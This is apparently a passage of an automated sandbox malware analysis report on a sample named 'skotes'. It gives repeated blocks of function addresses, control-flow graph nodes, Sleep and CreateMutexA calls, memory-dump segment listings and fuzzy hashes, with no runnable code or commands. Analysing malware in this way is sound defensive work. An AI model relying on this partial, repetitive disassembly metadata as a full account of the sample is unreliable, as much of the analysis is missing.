                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311320909.000000000099A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311337615.000000000099F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311352481.00000000009A1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311374544.00000000009AE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311396158.00000000009B0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_690000_skotes.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: CreateMutexSleep
                                                                                                                                                                                                                                          • String ID: T2o
                                                                                                                                                                                                                                          • API String ID: 1464230837-2760472518
                                                                                                                                                                                                                                          • Opcode ID: 118891223f66c982ccf93e6b631a7a23687d13c47e72a238ad1103fbfade7a25
                                                                                                                                                                                                                                          • Instruction ID: 22444c68dd797e28e46fe7be16261b01325bae30dc40926cfe8171e817c93a76
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 118891223f66c982ccf93e6b631a7a23687d13c47e72a238ad1103fbfade7a25
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: AE312931B001449FFF089BECDC89B6DB7A7EBC6310F244218E1149BBD5DB755A808796
                                                                                                                                                                                                                                          Function 0069A418 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 133sleepsynchronizationCOMMON
                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 124 69a418-69a438 128 69a43a-69a446 124->128 129 69a466-69a482 124->129 130 69a448-69a456 128->130 131 69a45c-69a463 call 6ad663 128->131 132 69a4b0-69a4cf 129->132 133 69a484-69a490 129->133 130->131 134 69a93f-69a949 call 6c6c6a * 2 130->134 131->129 138 69a4fd-69a916 call 6a80c0 132->138 139 69a4d1-69a4dd 132->139 136 69a492-69a4a0 133->136 137 69a4a6-69a4ad call 6ad663 133->137 155 69a94e 134->155 156 69a949 call 6c6c6a 134->156 136->134 136->137 137->132 144 69a4df-69a4ed 139->144 145 69a4f3-69a4fa call 6ad663 139->145 144->134 144->145 145->138 157 69a953-69a994 Sleep CreateMutexA 155->157 158 69a94e call 6c6c6a 155->158 156->155 160 69a9a7-69a9a8 157->160 161 69a996-69a998 157->161 158->157 161->160 162 69a99a-69a9a5 161->162 162->160
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • Sleep.KERNELBASE(00000064), ref: 0069A963
                                                                                                                                                                                                                                          • CreateMutexA.KERNELBASE(00000000,00000000,006F3254), ref: 0069A981
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2310380497.0000000000691000.00000040.00000001.01000000.00000007.sdmp, Offset: 00690000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310362606.0000000000690000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310380497.00000000006F2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310440680.00000000006F9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310459821.00000000006FB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310480195.0000000000707000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310578878.0000000000861000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310597404.0000000000863000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310616397.000000000087C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310632940.000000000087E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310649956.000000000087F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310649956.0000000000889000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310689049.000000000088D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310708966.000000000088E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310726399.0000000000891000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310744767.0000000000892000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310761898.000000000089B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310779161.00000000008A2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310802669.00000000008B4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310817843.00000000008B5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310836503.00000000008B6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310851449.00000000008B7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310868842.00000000008C3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310884881.00000000008CD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310908123.00000000008E9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310925434.00000000008F2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310943679.00000000008FF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310963193.0000000000902000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310981224.0000000000903000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310998973.0000000000905000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311018419.000000000090E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311037778.000000000090F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311052250.0000000000910000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311068907.0000000000913000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311087153.000000000091A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311110738.000000000091F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311128832.0000000000920000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311148034.0000000000922000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311166818.0000000000923000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311184463.000000000092B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311206565.0000000000942000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311221539.0000000000944000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311240106.000000000094D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311255567.000000000094E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311255567.000000000096B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311306441.0000000000999000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311320909.000000000099A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311337615.000000000099F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311352481.00000000009A1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311374544.00000000009AE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311396158.00000000009B0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_690000_skotes.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: CreateMutexSleep
                                                                                                                                                                                                                                          • String ID: T2o
                                                                                                                                                                                                                                          • API String ID: 1464230837-2760472518
                                                                                                                                                                                                                                          • Opcode ID: f33103b67b0f1c4f478184364a07534836da677216132a3af48a3192db9e8b33
                                                                                                                                                                                                                                          • Instruction ID: cff3433e2f7135f2c5f90b07b3366758c0c698269bec04871afa0cf4d8656bfb
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f33103b67b0f1c4f478184364a07534836da677216132a3af48a3192db9e8b33
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0C312931B001449BEF08ABFCDC89B6DB6E7EBC2314F20421CE0149BBD5DB7599808696
                                                                                                                                                                                                                                          Function 0069A54D Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 132sleepsynchronizationCOMMON
                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 164 69a54d-69a56d 168 69a59b-69a5b7 164->168 169 69a56f-69a57b 164->169 172 69a5b9-69a5c5 168->172 173 69a5e5-69a604 168->173 170 69a57d-69a58b 169->170 171 69a591-69a598 call 6ad663 169->171 170->171 176 69a944-69a949 call 6c6c6a 170->176 171->168 178 69a5db-69a5e2 call 6ad663 172->178 179 69a5c7-69a5d5 172->179 174 69a632-69a916 call 6a80c0 173->174 175 69a606-69a612 173->175 180 69a628-69a62f call 6ad663 175->180 181 69a614-69a622 175->181 191 69a94e 176->191 192 69a949 call 6c6c6a 176->192 178->173 179->176 179->178 180->174 181->176 181->180 195 69a953-69a994 Sleep CreateMutexA 191->195 196 69a94e call 6c6c6a 191->196 192->191 198 69a9a7-69a9a8 195->198 199 69a996-69a998 195->199 196->195 199->198 200 69a99a-69a9a5 199->200 200->198
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • Sleep.KERNELBASE(00000064), ref: 0069A963
                                                                                                                                                                                                                                          • CreateMutexA.KERNELBASE(00000000,00000000,006F3254), ref: 0069A981
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2310380497.0000000000691000.00000040.00000001.01000000.00000007.sdmp, Offset: 00690000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310362606.0000000000690000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310380497.00000000006F2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310440680.00000000006F9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310459821.00000000006FB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310480195.0000000000707000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310578878.0000000000861000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310597404.0000000000863000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310616397.000000000087C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310632940.000000000087E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310649956.000000000087F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310649956.0000000000889000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310689049.000000000088D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310708966.000000000088E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310726399.0000000000891000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310744767.0000000000892000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310761898.000000000089B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310779161.00000000008A2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310802669.00000000008B4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310817843.00000000008B5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310836503.00000000008B6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310851449.00000000008B7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310868842.00000000008C3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310884881.00000000008CD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310908123.00000000008E9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310925434.00000000008F2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310943679.00000000008FF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310963193.0000000000902000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310981224.0000000000903000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310998973.0000000000905000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311018419.000000000090E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311037778.000000000090F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311052250.0000000000910000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311068907.0000000000913000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311087153.000000000091A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311110738.000000000091F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311128832.0000000000920000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311148034.0000000000922000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311166818.0000000000923000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311184463.000000000092B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311206565.0000000000942000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311221539.0000000000944000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311240106.000000000094D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311255567.000000000094E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311255567.000000000096B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311306441.0000000000999000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311320909.000000000099A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311337615.000000000099F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311352481.00000000009A1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311374544.00000000009AE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311396158.00000000009B0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_690000_skotes.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: CreateMutexSleep
                                                                                                                                                                                                                                          • String ID: T2o
                                                                                                                                                                                                                                          • API String ID: 1464230837-2760472518
                                                                                                                                                                                                                                          • Opcode ID: 5442b5cc8a6086cc8181596e46836717841f56c6cc8c99a897b76bdf3c36b942
                                                                                                                                                                                                                                          • Instruction ID: 3e98949dfee2a32c63a852bfec379f111516314fafefb32faa3a1945662864cb
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5442b5cc8a6086cc8181596e46836717841f56c6cc8c99a897b76bdf3c36b942
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6C312731B001449BFF08ABF8CC89B6CBBABEBC5314F244618E414DBBD5CB7599818796
                                                                                                                                                                                                                                          Function 0069A682 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 131sleepsynchronizationCOMMON
                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 202 69a682-69a6a2 206 69a6d0-69a6ec 202->206 207 69a6a4-69a6b0 202->207 210 69a71a-69a739 206->210 211 69a6ee-69a6fa 206->211 208 69a6b2-69a6c0 207->208 209 69a6c6-69a6cd call 6ad663 207->209 208->209 214 69a949 208->214 209->206 212 69a73b-69a747 210->212 213 69a767-69a916 call 6a80c0 210->213 216 69a6fc-69a70a 211->216 217 69a710-69a717 call 6ad663 211->217 219 69a749-69a757 212->219 220 69a75d-69a764 call 6ad663 212->220 222 69a94e 214->222 223 69a949 call 6c6c6a 214->223 216->214 216->217 217->210 219->214 219->220 220->213 227 69a953-69a994 Sleep CreateMutexA 222->227 228 69a94e call 6c6c6a 222->228 223->222 234 69a9a7-69a9a8 227->234 235 69a996-69a998 227->235 228->227 235->234 236 69a99a-69a9a5 235->236 236->234
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • Sleep.KERNELBASE(00000064), ref: 0069A963
                                                                                                                                                                                                                                          • CreateMutexA.KERNELBASE(00000000,00000000,006F3254), ref: 0069A981
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2310380497.0000000000691000.00000040.00000001.01000000.00000007.sdmp, Offset: 00690000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310362606.0000000000690000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310380497.00000000006F2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310440680.00000000006F9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310459821.00000000006FB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310480195.0000000000707000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310578878.0000000000861000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310597404.0000000000863000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310616397.000000000087C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310632940.000000000087E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310649956.000000000087F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310649956.0000000000889000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310689049.000000000088D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310708966.000000000088E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310726399.0000000000891000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310744767.0000000000892000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310761898.000000000089B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310779161.00000000008A2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310802669.00000000008B4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310817843.00000000008B5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310836503.00000000008B6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310851449.00000000008B7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310868842.00000000008C3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310884881.00000000008CD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310908123.00000000008E9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310925434.00000000008F2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310943679.00000000008FF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310963193.0000000000902000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310981224.0000000000903000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310998973.0000000000905000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311018419.000000000090E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311037778.000000000090F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311052250.0000000000910000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311068907.0000000000913000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311087153.000000000091A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311110738.000000000091F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311128832.0000000000920000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311148034.0000000000922000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311166818.0000000000923000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311184463.000000000092B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311206565.0000000000942000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311221539.0000000000944000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311240106.000000000094D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311255567.000000000094E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311255567.000000000096B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311306441.0000000000999000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311320909.000000000099A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311337615.000000000099F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311352481.00000000009A1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311374544.00000000009AE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311396158.00000000009B0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_690000_skotes.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: CreateMutexSleep
                                                                                                                                                                                                                                          • String ID: T2o
                                                                                                                                                                                                                                          • API String ID: 1464230837-2760472518
                                                                                                                                                                                                                                          • Opcode ID: 9478ab91340f8ac921a18eccce36119bf4236cc46acfa019afe6e5b57190a1e2
                                                                                                                                                                                                                                          • Instruction ID: 9973423d4629349d2ddf4216c7bf5b445f13f20284a7ea39910dd4affce6049f
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9478ab91340f8ac921a18eccce36119bf4236cc46acfa019afe6e5b57190a1e2
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B73137316001449BEF089BFCCC89B6DBBFBEBC1314F244218E1149BBD1CB759A818696
                                                                                                                                                                                                                                          Function 00699ADC Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 107sleepsynchronizationCOMMON
                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
